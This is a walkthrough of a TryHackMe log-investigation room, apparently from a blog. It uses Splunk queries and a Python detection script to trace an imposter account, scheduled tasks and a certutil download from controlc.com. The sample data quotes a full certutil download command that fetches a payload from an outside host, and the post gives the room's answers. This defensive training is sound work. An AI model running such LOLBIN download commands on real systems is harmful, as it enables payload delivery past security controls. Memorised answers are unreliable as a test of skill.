TryHackMe | Benign Walkthrough
Hi there, I’m glad to see you here. In this article, we’ll solve the “Benign” room on TryHackMe together. In some sections, I’ll share a brief note about the subject. Don’t forget! You must always research further to learn more. I hope it will be helpful for you. Let’s start!
Introduction
We will investigate host-centric logs in this challenge room to find suspicious process execution. To learn more about Splunk and how to investigate the logs, look at the rooms splunk101 and splunk201.
Room Machine
Before moving forward, deploy the machine. When you deploy the machine, it will be assigned an IP. Access this room via the AttackBox, or via the VPN at MACHINE_IP. The machine will take up to 3–5 minutes to start. All the required logs are ingested in the index win_eventlogs.
Scenario: Identify and Investigate an Infected Host
One of the client’s IDS indicated a potentially suspicious process execution indicating one of the hosts from the HR department was compromised. Some tools related to network information gathering / scheduled tasks were executed which confirmed the suspicion. Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.
❗️Event ID 4688 : A new process has been created.
About the Network Information
Before we begin the analysis, I think we need to better understand the network structure of the company using information provided to us.
When we look at the table below, we can see that there are 3 different VLAN structures: “IT Department”, “HR Department” and “Marketing Department”.
Answer the questions below
Q1: How many logs are ingested from the month of March?
A1: 13959
If we set the time filter to include the month of March, we can detect the total number of events.
index=win_eventlogs
Q2: Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?
A2: Amel1a
When we examine the users of the relevant events from the “UserName” section in the “Field Pane”, we can see that there are 11 different users.
index=win_eventlogs
| stats count by UserName
Did you notice, in the list of users produced by the search above, that the attacker’s account name differs from a legitimate user’s name by a single changed letter? 👆🏻
Q3: Which user from the HR department was observed to be running scheduled tasks?
A3: Chris.fort
We can add the value “schtasks.exe” to the filter to examine events associated with scheduled tasks. ⏰
❗️schtasks.exe : Enables an administrator to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.
index=win_eventlogs schtasks.exe
And then when we look at the relevant users, we can see that the user named “Chris.fort” from the Human Resources Department is running scheduled tasks.
Q4: Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host?
A4: haroon
We can use the filter below to list which commands were executed by users in the Human Resources Department. (Note that each value must be compared against the UserName field explicitly; a bare quoted string such as "Chris.fort" would be searched as a free-text term across all fields.)
index=win_eventlogs (UserName="haroon" OR UserName="Chris.fort" OR UserName="Daina")
| stats count by CommandLine
When we examine the relevant commands, is there anything that draws your attention?
When we look at the details of the event to learn more, we can notice that the relevant command is executed by the user named “haroon”.
Q5: To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?
A5: certutil.exe
❗️Certutil.exe is a command-line program, installed as part of Certificate Services.
Q6: What was the date that this binary was executed by the infected host? format (YYYY-MM-DD)
A6: 2022-03-04
Q7: Which third-party site was accessed to download the malicious payload?
A7: controlc.com
When we examine the command that was executed, we can see the information of the third-party site that was accessed to download the malicious payload.
Q8: What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?
A8: benign.exe
We can see the file transferred from the Command & Control server to the host machine in the executed command. 💻
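The same checks we made by hand in Q2 through Q8 (spotting the lookalike account, finding who ran schtasks.exe, and pulling the site and file name out of the certutil download command) can be scripted. The block below is an added example, not part of the room or of this walkthrough; it runs over a handful of constructed Event ID 4688-style records whose field names (UserName, CommandLine) mirror the ones used in the Splunk searches above, and whose only real indicators are the ones the walkthrough already names.

```python
import re

# Constructed sample records shaped like the room's Splunk-indexed 4688 logs.
# Usernames and command lines are made up for this example, apart from the
# indicators already discussed above (certutil.exe, controlc.com, benign.exe).
SAMPLE_EVENTS = [
    {"UserName": "Amelia",     "CommandLine": "C:\\Windows\\System32\\notepad.exe"},
    {"UserName": "Amel1a",     "CommandLine": "C:\\Windows\\System32\\cmd.exe /c whoami"},
    {"UserName": "Chris.fort", "CommandLine": "schtasks.exe /create /tn Sync /tr C:\\tmp\\s.bat /sc daily"},
    {"UserName": "haroon",     "CommandLine": "certutil.exe -urlcache -split -f https://controlc.com/548ab556 benign.exe"},
    {"UserName": "Daina",      "CommandLine": "C:\\Windows\\explorer.exe"},
]

def edit_distance(a, b):
    """Levenshtein distance, used to spot near-duplicate account names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def find_lookalike_users(events, max_dist=1):
    """Pairs of distinct usernames within max_dist edits of each other
    (case-insensitive): a legitimate name next to its imposter."""
    names = sorted({e["UserName"] for e in events})
    return [(a, b) for i, a in enumerate(names) for b in names[i + 1:]
            if a.lower() != b.lower() and edit_distance(a.lower(), b.lower()) <= max_dist]

SCHTASKS = re.compile(r"\bschtasks\.exe\b", re.I)
# certutil's URL-fetch form: -urlcache [-split] -f <url> <output file>
CERTUTIL_DL = re.compile(
    r"\bcertutil(?:\.exe)?\b.*?-urlcache\b.*?-f\s+"
    r"(?P<url>https?://(?P<site>[^/\s]+)\S*)\s+(?P<file>\S+)", re.I)

def find_scheduled_task_users(events):
    """Users whose process creation events invoked schtasks.exe."""
    return sorted({e["UserName"] for e in events if SCHTASKS.search(e["CommandLine"])})

def find_lolbin_downloads(events):
    """Flag certutil-based downloads and extract who, which site, and which file."""
    hits = []
    for e in events:
        m = CERTUTIL_DL.search(e["CommandLine"])
        if m:
            hits.append({"user": e["UserName"], "url": m["url"], "site": m["site"], "file": m["file"]})
    return hits

if __name__ == "__main__":
    print("lookalike accounts:", find_lookalike_users(SAMPLE_EVENTS))
    print("schtasks users:", find_scheduled_task_users(SAMPLE_EVENTS))
    print("lolbin downloads:", find_lolbin_downloads(SAMPLE_EVENTS))
```

The lookalike check generalises the single-letter swap seen in Q2 to any one-edit variation of an existing account name, which is the usual shape of a typosquatted user.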
Q9: The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{……….}; what is that pattern?
A9: THM{********}
When we access the C2 server, there is a note waiting for us. 💌
Q10: What is the URL that the infected host connected to?
A10: https://controlc.com/548ab556
I think we’ve reached the end of another adventure. We’ll see you in the next attack analysis!
Thank you for your time. See you soon! Until then, Happy Hacking ❤
Resources:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia
https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil